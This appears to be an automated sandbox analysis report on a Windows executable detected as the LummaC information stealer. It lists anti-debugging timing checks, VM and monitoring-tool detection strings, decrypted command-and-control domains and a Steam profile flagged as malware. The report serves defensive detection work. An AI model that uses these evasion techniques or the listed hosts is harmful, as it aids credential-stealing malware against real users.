Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 102B2E1 second address: 102B306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FD8346DCB26h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jne 00007FD8346DCB2Ch 0x00000013 jbe 00007FD8346DCB28h 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e pop eax 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 102BADF second address: 102BB0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push ebx 0x00000007 jmp 00007FD8346DB205h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD8346DB1FFh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 102BC53 second address: 102BC58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 102BC58 second address: 102BC73 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD8346DB1F8h 0x00000008 push edi 0x00000009 je 00007FD8346DB1F6h 0x0000000f pushad 0x00000010 popad 0x00000011 pop edi 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 102BC73 second address: 102BCAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pushad 0x00000008 jmp 00007FD8346DCB38h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jno 00007FD8346DCB26h 0x00000015 jmp 00007FD8346DCB2Fh 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 102CE86 second address: 102CEA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FD8346DB208h 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10338C3 second address: 10338DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD8346DCB31h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10338DE second address: 10338E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103328E second address: 10332BB instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD8346DCB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jmp 00007FD8346DCB31h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop ecx 0x00000018 push ebx 0x00000019 jo 00007FD8346DCB37h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1033424 second address: 103343C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD8346DB201h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10335EA second address: 10335F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10335F2 second address: 10335F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1035141 second address: 103514C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103514C second address: 1035150 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1035150 second address: 103517D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DCB2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD8346DCB38h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1045E74 second address: 1045E96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FD8346DB1F6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f jmp 00007FD8346DB203h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1057A87 second address: 1057A8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1057A8B second address: 1057A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FD8346DB1F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1057A9B second address: 1057AA1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1057AA1 second address: 1057AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1057AA7 second address: 1057AAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 105F25A second address: 105F25E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 105F25E second address: 105F264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 105F264 second address: 105F276 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 js 00007FD8346DB1F6h 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 105F538 second address: 105F561 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DCB2Dh 0x00000007 pushad 0x00000008 jc 00007FD8346DCB26h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jc 00007FD8346DCB26h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pushad 0x0000001a pushad 0x0000001b push esi 0x0000001c pop esi 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 105F561 second address: 105F583 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FD8346DB1F6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD8346DB203h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 105F583 second address: 105F587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 105F587 second address: 105F58B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 105F58B second address: 105F5AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FD8346DCB26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FD8346DCB2Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 105FF59 second address: 105FF71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD8346DB202h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106449A second address: 10644A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10644A1 second address: 10644CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD8346DB207h 0x00000009 jnp 00007FD8346DB1F6h 0x0000000f popad 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jnc 00007FD8346DB1F6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10644CD second address: 10644D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10644D1 second address: 10644DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10644DC second address: 1064513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FD8346DCB37h 0x0000000d jmp 00007FD8346DCB2Bh 0x00000012 pushad 0x00000013 popad 0x00000014 jg 00007FD8346DCB26h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1064513 second address: 106452B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD8346DB204h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10690AC second address: 10690B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10690B2 second address: 10690B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10690B6 second address: 10690CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DCB32h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106A83E second address: 106A873 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DB209h 0x00000007 jmp 00007FD8346DB200h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f jg 00007FD8346DB1F6h 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1076616 second address: 1076635 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD8346DCB35h 0x00000008 jbe 00007FD8346DCB2Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10750ED second address: 1075106 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DB205h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1086D16 second address: 1086D1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1086D1A second address: 1086D38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FD8346DB205h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1086D38 second address: 1086D3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7DBF9 second address: F7DBFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109E777 second address: 109E7AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DCB2Bh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ja 00007FD8346DCB2Ah 0x00000011 pop esi 0x00000012 jbe 00007FD8346DCB3Ch 0x00000018 pushad 0x00000019 jns 00007FD8346DCB26h 0x0000001f jl 00007FD8346DCB26h 0x00000025 popad 0x00000026 push ebx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109E8D3 second address: 109E8D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109E8D9 second address: 109E8DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109E8DD second address: 109E8EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007FD8346DB1F6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109EE60 second address: 109EEA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DCB38h 0x00000007 jmp 00007FD8346DCB38h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ebx 0x00000014 pushad 0x00000015 push edi 0x00000016 pop edi 0x00000017 push edi 0x00000018 pop edi 0x00000019 jnc 00007FD8346DCB26h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109EEA7 second address: 109EEB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 jo 00007FD8346DB200h 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109F41A second address: 109F41E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109F41E second address: 109F422 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10A0E0E second address: 10A0E15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10A3B6C second address: 10A3B8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jg 00007FD8346DB1F6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FD8346DB1FEh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10A84BB second address: 10A84C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D80AED second address: 4D80B84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, bl 0x00000005 jmp 00007FD8346DB1FAh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ecx, dword ptr [eax+00000FDCh] 0x00000013 jmp 00007FD8346DB200h 0x00000018 test ecx, ecx 0x0000001a pushad 0x0000001b mov ecx, ebx 0x0000001d popad 0x0000001e jns 00007FD8346DB217h 0x00000024 pushad 0x00000025 mov edx, 70DDA268h 0x0000002a mov edx, 471E7D14h 0x0000002f popad 0x00000030 add eax, ecx 0x00000032 jmp 00007FD8346DB203h 0x00000037 mov eax, dword ptr [eax+00000860h] 0x0000003d jmp 00007FD8346DB206h 0x00000042 test eax, eax 0x00000044 jmp 00007FD8346DB200h 0x00000049 je 00007FD8A53913E5h 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007FD8346DB1FAh 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D80B84 second address: 4D80B8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D80B8A second address: 4D80B9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD8346DB1FDh 0x00000009 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: FB0AFC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: E03AD3 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 1039F8E instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe TID: 7344

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: file.exe, file.exe, 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000003.00000002.1345090990.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8
Source: file.exe, 00000003.00000002.1345090990.0000000000AE8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1345090990.0000000000AD0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 3_2_00DE5BB0 LdrInitializeThunk,

3_2_00DE5BB0

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: file.exe	String found in binary or memory: licendfilteo.site
Source: file.exe	String found in binary or memory: clearancek.site
Source: file.exe	String found in binary or memory: bathdoomgaz.stor
Source: file.exe	String found in binary or memory: spirittunek.stor
Source: file.exe	String found in binary or memory: dissapoiznw.stor
Source: file.exe	String found in binary or memory: studennotediw.stor
Source: file.exe	String found in binary or memory: mobbipenju.stor
Source: file.exe	String found in binary or memory: eaglepawnoy.stor

Source: file.exe, file.exe, 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: TProgram Manager

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 Process Injection	24 Virtualization/Sandbox Evasion	OS Credential Dumping	631 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	24 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	4 Obfuscated Files or Information	NTDS	23 System Information Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
file.exe	42%	ReversingLabs	Win32.Trojan.Generic
file.exe	100%	Avira	TR/Crypt.ZPACK.Gen
file.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english	0%	URL Reputation	safe
https://help.steampowered.com/en/	0%	URL Reputation	safe
https://store.steampowered.com/news/	0%	URL Reputation	safe
https://store.steampowered.com/subscriber_agreement/	0%	URL Reputation	safe
http://store.steampowered.com/subscriber_agreement/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en	0%	URL Reputation	safe
http://www.valvesoftware.com/legal.htm	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	0%	URL Reputation	safe
https://store.steampowered.com/stats/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	0%	URL Reputation	safe
https://store.steampowered.com/steam_refunds/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&	0%	URL Reputation	safe
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	0%	URL Reputation	safe
https://store.steampowered.com/legal/	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900	100%	URL Reputation	malware
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl	0%	URL Reputation	safe
http://store.steampowered.com/privacy_agreement/	0%	URL Reputation	safe
https://store.steampowered.com/points/shop/	0%	URL Reputation	safe
https://store.steampowered.com/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900/inventory/	100%	URL Reputation	malware
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	0%	URL Reputation	safe
https://store.steampowered.com/privacy_agreement/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en	0%	URL Reputation	safe
